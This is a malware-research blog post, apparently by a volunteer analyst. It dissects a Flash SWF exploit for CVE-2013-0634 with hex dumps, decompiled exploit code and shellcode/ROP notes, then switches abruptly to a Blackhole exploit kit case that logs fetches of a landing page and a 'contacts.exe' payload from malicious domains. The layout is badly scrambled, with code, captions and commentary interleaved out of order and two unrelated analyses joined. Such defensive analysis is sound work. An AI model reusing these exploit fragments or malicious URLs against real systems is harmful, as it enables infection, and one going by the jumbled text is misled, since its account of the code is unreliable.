I had little discussion with Eric Romang about this matter in twitter. Since this CVE is new, maybe NOW we won't see the false positive of this post's code to be detected as "malware" by some security industry scanner, but I am afraid since most web-scanner is doing string matching for detection of "malcode" in web sites, sooner or later FP will occur, so beforehand I am assuring you there is no malicious codes were posted as per it is here, every code are tweaked, neutralized and cannot run nor be used to infect at all. Furthermore most codes shown are flash JS/code which cannot use as per usual web site's embedded JavaScript.The Sample
New information:The VT sample "ieee2013.swf" w/hash: bf29f7d83580b4b4355dbc8a82b4972aWAS NOT the CVE-2013-0634,but CVE-2013-0633 embedded swf, #AFatBigLie
— Hendrik ADRIAN (@unixfreaxjp) February 13, 2013
As per advised I took liberty to choose sample posted in VirusTotal -->>[URL],
and I picked the recent one with the below details:Sample : ieee2013.swfAt the time I choosed, it was so convincing.. But during analyzing the sample deeper it turned out fakes..
MD5 : bf29f7d83580b4b4355dbc8a82b4972a
SHA256 : 19a5e24e8c90e2d7f65729455c3fd8b89ebbfdc8d218db3ab4a3193100106267
File size: 498.8 KB ( 510762 bytes )
File name: ieee2013.swf
File type: Flash
Tags: exploit flash cve-2013-0634
Detection ratio: 12 / 45
Analysis date: 2013-02-08 19:32:42 UTC ( 17 hours, 20 minutes ago )
Malware names:
F-Secure : Dropped:Trojan.Agent.AYAF
DrWeb : Exploit.CVE2013-0633.1
GData : Dropped:Trojan.Agent.AYAF
Norman : Shellcode.E
McAfee-GW-Edition : Heuristic.BehavesLike.Exploit.Flash.CodeExec.O
MicroWorld-eScan : Dropped:Trojan.Agent.AYAF
Avast : Win32:Malware-gen
nProtect : Dropped:Trojan.Agent.AYAF
BitDefender : Dropped:Trojan.Agent.AYAF
McAfee : Exploit-CVE2013-0633
ESET-NOD32 : SWF/Exploit.CVE-2013-0634.A
Microsoft : Exploit:SWF/CVE-2013-0634Updates - 2013, Feb 26, just before midnight..
Eric Romang (@eromang) found CVE-2013-0634 in the wild spread by Gong Da(d) Exploit Kit, which can be read in his report here -->>[HERE]The sample he uploaded into Virus Total in here -->>[VIRUS-TOTAL]And I confirmed it as the same code as we posted in this post. Snapshot of the codes is:So this is the hard evidence for this exploit that infects in the wild. For the research purpose, you may confirm yourself here -->>[HERE]I thank Eric Romang for the sharing the information that we must aware of!
#Exploit Info -@eromang found #CVE-2013-0634 spread In The Wild!! sample is: virustotal.com/en/file/83406e… #TruthRevealed twitter.com/unixfreaxjp/st…
— Hendrik ADRIAN (@unixfreaxjp) February 26, 2013Understanding the Structure
It is good to visualize the structure of swf sample. I use Action Script for this purpose, this sample looks like below:We need to break it down now, using SWF dumper tool to see the format:
* Total # of File Tags: 88↑so we HAVE two binaries embedded from the beginning. Viewing the meta data we know it fakes "Adobe Flex 4 Application"
* End (0) -- total: 1
* ScriptLimits (65) -- total: 1
* DoABC2 (82) -- total: 1
* ShowFrame (1) -- total: 1
* FileAttributes (69) -- total: 1
"* DefineBinaryData (87) -- total: 2 <==w00t"
* SetBackgroundColor (9) -- total: 1
* ProductInfo (41) -- total: 1
* FrameLabel (43) -- total: 1
* SymbolClass (76) -- total: 1
* Metadata (77) -- total: 1<Metadata>I tend to check SWF timestamp in product info:
<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>
<rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/elements/1.1'>
<dc:title>Adobe Flex 4 Application</dc:title>
<dc:date>Feb 4, 2013</dc:date>
</Metadata><ProductInfo product='Adobe Flex' edition=''Checking the SymbolClass:
version='4.6' build='23201'
compileDate='Tue Feb 5 00:56:14 2013 UTC'/><SymbolClass>↑You'll see the classes with the string of x32 and x64 in there.. These are binary tags:
<Symbol idref='1' className='LadyBoyle_the_x32_Class' />
<Symbol idref='2' className='LadyBoyle_the_x64_Class' />
<Symbol idref='0' className='LadyBoyle' />
</SymbolClass><DefineBinaryData id='1' idrefName='LadyBoyle_the_x32_Class' length='247296' />So let's confirm whether the embedded binaries are really there, if so let's figure its type. Recheck by hex of the symbol class part.. to double check...
<DefineBinaryData id='2' idrefName='LadyBoyle_the_x64_Class' length='246272' />3f 13 42 00 00 00 03 00 01 00 4c 61 64 79 42 6f | ?*B*******LadyBo |OK looks binaries are there..to be sure, let's dump and see it.. Here's the x32 first block...
79 6c 65 5f 74 68 65 5f 78 33 32 5f 43 6c 61 73 | yle_the_x32_Clas |
73 00 02 00 4c 61 64 79 42 6f 79 6c 65 5f 74 68 | s***LadyBoyle_th |
65 5f 78 36 34 5f 43 6c 61 73 73 00 00 00 4c 61 | e_x64_Class***La |
64 79 42 6f 79 6c 65 00 | dyBoyle* |ff 15 06 c6 03 00 01 00 00 00 00 00 4d 5a 90 00 | ************MZ** |And the second one...x64 binary (1st block snipped)
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 | run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c 49 48 4c | .***$*******|IHL |
38 28 26 1f 38 28 26 1f 38 28 26 1f 31 50 a2 1f | 8(&*8(&*8(&*1P** |
21 28 26 1f 31 50 b3 1f 28 28 26 1f 31 50 a5 1f | !(&*1P**((&*1P** |
70 28 26 1f 1f ee 5d 1f 3b 28 26 1f 38 28 27 1f | p(&***]*;(&*8('* |
77 28 26 1f 31 50 ac 1f 3b 28 26 1f 31 50 b7 1f | w(&*1P**;(&*1P** |
39 28 26 1f 52 69 63 68 38 28 26 1f 00 00 00 00 | 9(&*Rich8(&***** |
00 00 00 00 50 45 00 00 4c 01 05 00 fc 40 10 51 | ****PE**L****@*Q |
00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 | ***********!**** |
00 66 00 00 00 5c 03 00 00 00 00 00 d6 13 00 00 | *f***\********** |ff 15 06 c2 03 00 02 00 00 00 00 00 4d 5a 90 00 | ************MZ** |by experience I know both are the DLL files..
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 | run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 25 09 b1 | .***$********%** |
e0 44 67 e2 e0 44 67 e2 e0 44 67 e2 e9 3c e3 e2 | *Dg**Dg**Dg**<** |
f9 44 67 e2 e9 3c e4 e2 a4 44 67 e2 e9 3c f2 e2 | *Dg**<***Dg**<** |
e9 44 67 e2 c7 82 1c e2 e5 44 67 e2 e0 44 66 e2 | *Dg******Dg**Df* |
b2 44 67 e2 e9 3c ed e2 e3 44 67 e2 e9 3c f6 e2 | *Dg**<***Dg**<** |
e1 44 67 e2 52 69 63 68 e0 44 67 e2 00 00 00 00 | *Dg*Rich*Dg***** |
00 00 00 00 50 45 00 00 64 86 06 00 fa 40 10 51 | ****PE**d****@*Q |
00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 | **********" **** |Code Analysis
All of the variables prepared for exploitation always appears in pairs.. for example like below, suggested different methods used for x32 & x64:(_local5[_local7][_local22] as Vector. < Number > )[17] = this.UintToDouble(0xFFFFFFFF, _local9);Despite the pairing scheme, also spotted "generic" code scheme i.e.: Checking the exact version of Windows OS:
(_local5[_local7][_local22] as Vector. < Number > )[18] = this.UintToDouble(0x41414141, 0);switch (_local19) {It scattered exploit strings into some value of integer with _local%n names, it checked the Windows OS's flash player version & allocate different integer value if flash player contains playertype=activex (see below), ...and...
case "windows 7":
case "windows server 2008 r2":
case "windows server 2008":
case "windows server 2003 r2":
case "windows server 2003":
case "windows xp":
case "windows vista":
return (this.empty()); };switch (_local27) {.. then preparing bigger init value for flash without activeX...
case "win 11,5,502,146":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 1838536);
_local26 = (_local16 - 574720); };
case "win 11,5,502,135":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 2266027);
_local26 = (_local16 - 574864); };
case "win 11,5,502,110":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 1600110);
_local26 = (_local16 - 574424); };
case "win 11,4,402,287":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 4624790);
_local26 = (_local16 - 574196); };
case "win 11,4,402,278":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 1227937);
_local26 = (_local16 - 573876); };
case "win 11,4,402,265":
if (capabilities.playertype.tolowercase() == "activex") {
_local25 = (_local16 - 7925883);
_local26 = (_local16 - 573876); };
break;default:The other part of exploit values are implemented into other "_local*" variables in seperated section as per I pasted it here -->>[HERE][Additional] As so many other researchers also already noticed, it is spotted the regex operation suspected the direct exploitation by it. Actually I wanted to expose this after getting more info, but OK, since so many questions came.. here we go: It filled a var with this regex string & assigned it to RegExp:
(_local5[_local7][_local22] as Vector. < Number > )[536870911] = this.UintToDouble(16, _local9);
return; };_local2 = "(?i)()()(?-i)||||||||||||||||||||||";To be used in the operation in forming object of exploitation:
var _local20: RegExp = new RegExp(_local2, "");Why this regex was used? We saw it to be used as per it is.. To grep the pattern defined, PoC the debug code:
3509 pushstring "(?i)()()(?-i)||||||||||||||||||||||"And the memory snapshot below:
3512 findpropstrict RegExp //nameIndex = 66
3517 constructprop RegExp (2) //nameIndex = 66
3520 coerce RegExp //nameIndex = 660a 77 69 6e 64 6f 77 73 20 78 70 0d 77 69 6e 64| *windows xp*wind |↑At the time regex executed, it runs w/o crash. So if RegEXP aka regex value of "(?i)()()(?-i)||||||||||||||||||||||" has anything to do with the direct exploitation is still a question to me. The exploitation happened at the time the texfield filled with the malicios vector contains the exploit bit (in my case). That's why I desperately need to seek other samples or better memory shot to be sure of this regex method, & reason why I did not write it before too. [NEW ADDITIONAL] The usage of the regex which functioned as the trigger to the overall exploitation is explained by HaifeiLi -->>[HERE] Let's continue: The _local5 array contains vector <number> and <object> and the below checkpoints was making sure of it
6f 77 73 20 76 69 73 74 61 0c 66 72 6f 6d 43 68| ows vista*fromCh |
61 72 43 6f 64 65 06 52 65 67 45 78 70 23 28 3f| arCode*RegExp#(? |
69 29 28 29 28 29 28 3f 2d 69 29 7c 7c 7c 7c 7c| i)()()(?-i)||||| |
7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c| |||||||||||||||| |
7c 06 6c 65 6e 67 74 68 10 77 72 69 74 65 55 6e| |*length*writeUn |
73 69 67 6e 65 64 49 6e 74 0a 70 6c 61 79 65 72| signedInt*player |
54 79 70 65 07 61 63 74 69 76 65 78 05 66 6c 75| Type*activex*flu |
73 68 0a 77 72 69 74 65 42 79 74 65 73 05 45 72| sh*writeBytes*Er |
72 6f 72 01 65 0c 66 6c 61 73 68 2e 65 76 65 6e| ror*e*flash.even |
74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68| ts*EventDispatch |
65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| er*DisplayObject |
11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65| *InteractiveObje |
63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| ct*DisplayObject |
43 6f 6e 74 61 69 6e 65 72 1a 16 01 16 05 16 08| Container******* |if we follow it further the _local5 will be used by additional hard-coded bits:
Next.. depends on the processor type it assembled the strings by - using writeUnsignedInt. This is that code for x32...
// initiation of the bins.. see the 0x41 0x41 0x41 starts..And this is for x64...
while (_local1 < (0x0400 * 100)) {
// transfering the result to other vars...
_local12 = (_local12 + _local17.position);
_local14 = _local17.position;
// building the x32 exploit here...with the Unsigned interger flood...
_local17.endian = Endian.LITTLE_ENDIAN;
_local34 = _local17.position;
_local17.position = (_local17.position + 224);
_local17.position = _local34;
_local17.position = (_local17.position + 160);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.position = _local34;
_local17.position = (_local17.position + 40);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.position = (_local34 + 0x0100);
:(snipped)_local17.writeBytes(_local35, 0, _local35.length);The _local17 above was filled by values of vector objects filled by the logic of Random → Vector flood by ByteArray → formed into function ReadDouble to be used to form exploit object, flow details is--->>[HERE]Please be noted the usage of hard coded bit 0x41414141 in the vector object and usage of 0xFFFFFFF8
_local12 = _local13;
_local15 = ((((_local12 + 128) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local15 = ((((_local12 + 16) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = (_local12 + _local14);
_local17.position = _local14;
//// Buiding x64 exploit,
_local34 = _local17.position;
_local17.position = (_local17.position + 224);
_local17.position = _local34;
_local17.position = (_local17.position + 160);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.position = _local34;
_local17.position = (_local17.position + 40);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.position = (_local34 + 0x0100);
:(snipped)for gaining heap allocation/deallocationis used. Correction:0xFFFFFFF8 is used to convert 0x*******1 to 0x*******0 which is the correct address for exploit. ) ←Thank's to @promised_lu for pointing this :-) PS: I still can't figure why the hardcoded 0x41414141 bit is there... The usage of text field with font to be filled by exploit values aiming for the overflow was also detected:After exploit form is built, it went into an execution of part of the forming code the object which in the debug code can be viewed below:
function empty(): void {
" var _local1: textfield = new textfield();"
_local1.autosize = TextFieldAutoSize.left;
var _local2: textformat = new textformat();
_local2.size = 30;
_local2.font = "Arial";
_local2.color = 0xFF0000;
" _local1.settextformat(_local2);"
_local1.text = " ";
" addChild(_local1);"0 getlocal0↑It means: using the flash.utils::ByteArray to write integer as little endian (
1 pushscope
2 findpropstrict flash.utils::ByteArray //nameIndex = 19
4 constructprop flash.utils::ByteArray (0) //nameIndex = 19
7 coerce flash.utils::ByteArray //nameIndex = 19
9 setlocal3
10 getlocal3
11 getlex flash.utils::Endian //nameIndex = 40
13 getproperty LITTLE_ENDIAN //nameIndex = 41
15 setproperty endian //nameIndex = 42
17 getlocal3
18 getlocal1
19 callpropvoid writeInt (1) //nameIndex = 43
22 getlocal3
23 getlocal2
24 callpropvoid writeInt (1) //nameIndex = 43I call this stream-outreferred to Adobe API = "extracting") ..to WriteInt values as per mixed in hex-->>[HERE](need to split these in two for x32 and x64.. a lot ow work to do..) ..to then execute process below:25 pushbyte 0..at this point the return for value pointing LadyBoyle x32 OR x64 binary Class (the code is below)
26 setproperty position //nameIndex = 44
27 getlocal3
28 callproperty readDouble (0) //nameIndex = 45
29 returnvalueimport mx.core.*;↑for the x32 ..and for the x64↓
public class LadyBoyle_the_x32_Class extends ByteArrayAsset {import mx.core.*;to extract the embedded object as per described here -->>[AdobeAPIPage]The complete decompilation code of the SWF of CVE-2013-6034 in neutralized code is here -->>[PASTEBIN]
public class LadyBoyle_the_x64_Class extends ByteArrayAsset {The debug..
It's time to run this swf in debug mode.. like a binary analysis I want to capture everything I could. The (long) complete debug main init trace list is here --->>[HERE]See how it ends up to point classes of the_x32_Class:Class or the_x64_Class:Class You also can grep the "pushint" to grep all of the pushed value related codes - for the x32 and x64 -->>[HERE]If we divided it right we may slit the value of x32 and x64. (on it..)You can compare those strings with the memory snapshot here --->>[HERE]The dump binary can be downloaded here -->>[HERE] Since the code initiate the 32 & 64 bit as detailed classes↓...this.the_x32_Class = LadyBoyle_the_x32_Class;...and the below are the trace of execution of LadyBoyle by of 32/64 bit to get the binary object embedded. For 32bit:
this.the_x64_Class = LadyBoyle_the_x64_Class;init():*The 64bit..
// disp_id=0 method_id=15 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3689 code position=16442
0 getlocal0
1 pushscope
2 findpropstrict LadyBoyle_the_x32_Class //nameIndex = 80
4 getlex Object //<--- nameIndex = 54
6 pushscope
7 getlex flash.utils::ByteArray //nameIndex = 19
9 pushscope
10 getlex mx.core::ByteArrayAsset //nameIndex = 18
12 pushscope
13 getlex mx.core::ByteArrayAsset //nameIndex = 18
15 newclass LadyBoyle_the_x32_Class
17 popscope
18 popscope
19 popscope
20 initproperty LadyBoyle_the_x32_Class //nameIndex = 21
22 returnvoidinit():*The getlex for objects→ByteArray→ByteArrayAsset→is calling embedded "LadyBoyle" class contains malware DLL binary to be extracted in the victim's PC.. [Additional-2] @promised_lu, the author of pmswalker was making a very good reversing for the this exploit sample which exposing security baypass' ROP Chain & SHELLCODE formed during exploitation. You can see his good analysis here -->>[LINK] This is VERY important chain that I was looking for from beginning the existance of the shellcode which explained the below operations: Searching for %Temp% path and load a library, as per below:
// disp_id=0 method_id=18 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3701 code position=16498
0 getlocal0
1 pushscope
2 findpropstrict LadyBoyle_the_x64_Class //nameIndex = 81
4 getlex Object // <----nameIndex = 54
6 pushscope
7 getlex flash.utils::ByteArray //nameIndex = 19
9 pushscope
10 getlex mx.core::ByteArrayAsset //nameIndex = 18
12 pushscope
13 getlex mx.core::ByteArrayAsset //nameIndex = 18
15 newclass LadyBoyle_the_x64_Class
17 popscope
18 popscope
19 popscope
20 initproperty LadyBoyle_the_x64_Class //nameIndex = 22
22 returnvoid:With noted that shellcode use of stackpivot restore the stack back to the normal flow of execution to prevent the crash. He also reversed the abc.cfg executed as libs via shellcode:
069442C2 FFE0 jmp eax
; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg",
; LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg"):↑which explaining the dropping of seccetnter.xxx payload. All of the above is possible since the ALSR and DEP are bypassed, and he explianed the ROP Chain for it as per quoted below:
*(_DWORD *)p2 = dword_10009278; // 'cces'
*((_DWORD *)p2 + 1) = dword_1000927C; // 'etne'
*((_DWORD *)p2 + 2) = dword_10009280; // 'xx.r'
*((_WORD *)p2 + 6) = word_10009284; // 'x'
:06944000 7C809AE1 kernel32.VirtualAlloc#w00t to @promised_lu :-) good job! This solves the all mistery of this exploitation, conclusion:
06944004 06944088 /CALL to VirtualAlloc
06944008 06944000 |Address = 06944000
0694400C 00002000 |Size = 2000 (8192.)
06944010 00001000 |AllocationType = MEM_COMMIT
06944014 00000040 \Protect = PAGE_EXECUTE_READWRITEThe usage of hardcoded bits, details in address calculation, using the heap spray with the changes of stack value (stackpivot), with the ROP of by passing ASLR and DEP is a VERY sophisticated technique to be used in this exploitation. The technique exploitation of this sample is proven to be Memory Corruption base of the exploitation.Research Material & Samples
For raising AV detection rates & research purpose, sample-->>[HERE]The SWF's embedded DLL malwares is having the below VT ratio:SHA256: d6459e851fda540159a78aa901b46cc2e921c57952e961edf4d817b4f5a82f14 SHA1: c6bff71c4c9ac92f78995ac9097f8cc13779a8fc MD5: b4da1c3400b48803b41823feaf6085e8 File size: 241.5 KB ( 247296 bytes ) File name: CVE-2013-0634-x32bin.drop.dll File type: Win32 DLL Tags: exploit cve-2013-0634 pedll Ratio: 21 / 41 Date: 2013-02-10 17:48:27 UTC ( 37 minutes ago ) URL ---->>[CLICK] F-Secure : Dropped:Trojan.Agent.AYAF GData : Dropped:Trojan.Agent.AYAF VIPRE : Trojan.Win32.Generic!BT Symantec : Trojan Horse ESET-NOD32 : Win32/TrojanDropper.Agent.QAU McAfee-GW-Edition : Heuristic.BehavesLike.Win32.PasswordStealer.H Fortinet : W32/Agent.QAU!tr TrendMicro-HouseCall : TROJ_GEN.R11H1B8 MicroWorld-eScan : Dropped:Trojan.Agent.AYAF Avast : Win32:Malware-gen nProtect : Dropped:Trojan.Agent.AYAF Kaspersky : Trojan.Win32.Delf.dedq BitDefender : Dropped:Trojan.Agent.AYAF McAfee : BackDoor-FAKV!B4DA1C3400B4 Ikarus : Trojan.Win32.Bredolab Panda : Trj/CI.A AhnLab-V3 : Win-Trojan/Infostealer.247296 AntiVir : DR/Agent.AYAF PCTools : Trojan.Generic Sophos : Troj/Agent-ZUP Comodo : UnclassifiedMalwareSHA256: b03623e4818e60869f67dba28ab09187782a4ae0f4539cef2c07634865f37e74 SHA1: 040069e5ecf1110f6634961b349938682fee2a22 MD5: dbc7e219e9af297271ea594f0ff6ad12 File size: 240.5 KB ( 246272 bytes ) File name: CVE-2013-0634-x64bin.drop.dll File type: Win32 DLL Tags: exploit cve-2013-0634 pedll Ratio: 17 / 46 Date: 2013-02-10 17:49:04 UTC ( 39 minutes ago ) URL ---->>[CLICK] F-Secure : Trojan.Generic.8698229 DrWeb : BackDoor.Poison.1033 GData : Trojan.Generic.8698229 VIPRE : Trojan.Win32.Generic!BT Norman : Killav.LB ESET-NOD32 : Win64/TrojanDropper.Agent.U TrendMicro-HouseCall : TROJ_GEN.R47H1B9 MicroWorld-eScan : Trojan.Generic.8698229 Avast : Win32:Malware-gen nProtect : Trojan.Generic.8698229 BitDefender : Trojan.Generic.8698229 McAfee : BackDoor-AKV Panda : Trj/CI.A Ikarus : Win32.Malware AVG : Small.EWV Emsisoft : Malware.Win64.AMN (A) Comodo : UnclassifiedMalwareWhile trying to figure how the exploit execute the attached DLL, I took a video. and in one of the session I took the video from my Droid camera:Thank you very much for fellow researchers who encourage be to analyze this:
@eromang @malwaremustdie shes not very nice
— Lance Brandy (@Lance37Brandy) February 9, 2013False Positive Possibilities
I am so worry that if some security scanner will use the word "LadyBoyle" to grep & classify the detection of CVE-2013-0634, which exactly will NOT stop the infection of CVE-2013-0634 (since that is just a name of a "changeable" class inside an infector SWF file which I doubt that you can scan it online) BUT it will exactly will block this post to be viewed by public.
This post is dedicated to the security research, hopefully to be a useful reference of CVE-2013-0634, please kindly help to notice us in twitter if the false positive alarm happens. Thank you very much.
I really want to see the sample, if anyone has it please upload it via our blog's DropBox?The other Flash 0day found in the wild & used against Mac OS X (CVE-2013-0634) results from an integer overflow in CFF font handling #Flash
— VUPEN Security (@VUPEN) February 8, 2013
The mentioned "font method", or to be precised, in our case was the usage of textfield object (to be filled with exploit data) with setting .settextformat contains a font definition, indeed detected too in this post, but did not see any MacOSX target in my sample, so that must be same type of exploit yet a separately made. I wonder was it a only a MS Word's .doc file?
I am on a half way on a plane of a long trip, got many spare time so I checked some queries to malware site. I received the report to investigate a Blackhole Exploit Kit, the clue was the infected domain of 33sdfguuh.mywww.biz, I had no idea so the first try I did was requesting the domain in the urlquery and ending up with the below suspected landing page url:[NEW!] New case infection w/same payload type & infection MO in different domain.
Landing page: 3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Payload: ZeroAccess
Exploit: Java: #CVE-2010-4476 #CVE-2013-0422, PDF: #CVE-2010-0188, CVE-2009-0927
Sorry for the report in text--> http://pastebin.com/raw.php?i=HPESHngh
#MalwareMustDie!33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.phpGot so attempted so I fetched:--2013-02-05 21:45:24-- h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.phpThe inside was the common Backhole v2.x's landing Page ofuscation, which manually cracked to be plugin detect script like this -->>[PASTEBIN] Some of the highlight are below:
Resolving 33sdfguuh.mywww.biz... seconds 0.00,
Caching 33sdfguuh.mywww.biz =>
Connecting to 33sdfguuh.mywww.biz||:80... seconds 0.00, connected.
"GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0"
Referer: http://malwaremustdie.com
"Host: 33sdfguuh.mywww.biz"
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 12:45:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: "209tuj2dsljdglsgjwrigslgkjskga.php"
"2013-02-05 21:45:27 (90.4 KB/s) - 209tuj2dsljdglsgjwrigslgkjskga.php saved [113594]"1. The usage of the pair of directories of /closest/ & 2. they don't put shellcode or the malware payload download in the landing page, instead scattered in the exploit file infector. 3. two pdfs, two jars and one payload.BHEK is BHEK, by using our guideline -->>[HERE] you can get these samples:FYI the 2 PDFs urls is are as per below (this is for people who got attack by these Blackhole which mostly seeing these PDF downloads URL in their log..)
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?dsmq=30:1n:1i:1i:33&lllsxi=3g:3a:3c&bdm=30:33:1n:1m:1h:33:30:1o:30:1h&uzz=1k:1d:1f:1d:1g:1d:1fI started to get the payload from the smallest size of PDF, to find the JS/Evil/Code written in the 0x11AF-0x2768 section with text below:
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?qbzntsus=30:1n:1i:1i:33&cazv=39&alltb=30:33:1n:1m:1h:33:30:1o:30:1h&mkitrggt=1k:1d:1f:1d:1g:1d:1fThe red mark is the evil script, where the purple mark is the long obfuscation var/array, and the yellow mark is the deobfuscator logic. Following the usual method to decode this, we'll find the infector script burped as per first upper part below, marked area is the shellcode in text:
And the lower part which having Libtiff overflow CVE-2010-0188 exploit code:
*) Noted: I marked the part it checked the Adobe version. Well shortly the shellcode will look like below, contains the payload's url:
Well, I just downloaded it..
GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&ofa=30:33:1n:1m:1h:33:30:1o:30:1h&omtvgame=1i&tdn=trnwuek&hxx=ynkt HTTP/1.0Now we have the payload below:
Referer: http://malwaremustdie.blogspot.com
User-Agent: Gottcha!
Host: 33sdfguuh.mywww.biz
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 13:17:33 GMT
Content-Type: application/x-msdownload
Content-Length: 176128
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Tue, 05 Feb 2013 13:17:40 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
200 OK
Registered socket 1892 for persistent reuse.
Length: 176128 (172K) [application/x-msdownload]
Saving to: `contacts.exe'
2013-02-05 22:17:37 (84.9 KB/s) - `contacts.exe' saved [176128/176128]*)Noted: I marked my local time of my PC when I fetched. Nothing special about the file's looks & dull-usual name of contacts.exe
Debug investigation of the payload
So it's time to debug it to understand: 1. First the moronz encrypted the binary, see -->>[HERE] the section .text and .data was garbled, trailing the bins made me only stuck at the 0x40A209 in .text section:0x40A209 add esi, 1Fh2. Shortly I figured some mistery by debugging it to find these clue: This mess loading DLL by using these methods..
0x40A20C pushf
0x40A20D or word ptr [esp], 1
0x40A212 nop
0x40A213 popf
0x40A214 wait
0x40A215 push ebp
0x40A216 wait
0x40A217 pop ebp
0x40A218 nop
0x40A219 rep cld
0x40A21B jb loc_40A49D
0x40A221 pop ds
0x40A222 pop ds
0x40A223 cmp dl, bh
0x40A225 push ecx
: (skip)
0x40A229 var_44 = word ptr -6583D684h
0x40A229 var_42 = byte ptr -6583D682h
0x40A229 var_25 = byte ptr -6583D665h
0x40A229 var_23 = byte ptr -6583D663h
: (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40A839
0x40A2F9 ; FUNCTION CHUNK AT 0x40A874
: (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC63LdrLoadDllUse below command to decrypt:
LdrGetDllHandleuncrypted.exeDetecting/search the below programs / services:
Microsoft Base Cryptographic Provider v1.0Windows DefenderDebugged further to find that this malware stopping these processes:
mpssvcMsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfePoC code in ASM here -->>[PASTEBIN]Looks also erasing/throwing off something via registry:RECYCLER\With some more registry traces...
$Recycle.Bin\InprocServer32A nice attempt to use his filename to save itself..
:TEMP=Internet access command -1- Get GeoIP Info & safe/get CN code..
\InstallFlashPlayer.exeGET /app/geoip.js HTTP/1.0If you simulate this into your browser, you'll get your all GeoIP data + lat/long coordinates.
Host: j.maxmind.com
Connection: close
geoip_country_codeInternet access command -2- get the counter...
GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1I dumped this data from memory after fetching the last URL above...
Host: bigfatcounters.com
User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
Connection: close↑oh.. is an image file.. a counter↓
Behavior Analysis
So what was happened when I run it? It was as per below snapshot:The execution of CMD for self (copy+)deletion.. It requests the DNS query to the google, AND to these specific IP!↓ ADM-SERVICE-NET (Monaco)Except the above http, I detected UDP request to access these IP/port: TechEVE Ltd TE-SAFESUGAR (UK) short session of infection goes like this: these are the snapshot of UDP, malform DNS requests I was talking about:
It sent the malform DNS with the request is like this:
Any idea what is this, friends? :-) Furthermore let's see what's the file process & networking + registry-->>[HERE]Is a full run log on asession of one infection I made it on my PC :-) Please try to grep values like "RegSet" or "CreateFile", "UDP" to be more focus in understanding how this malware's work. In registry there's some changes in:
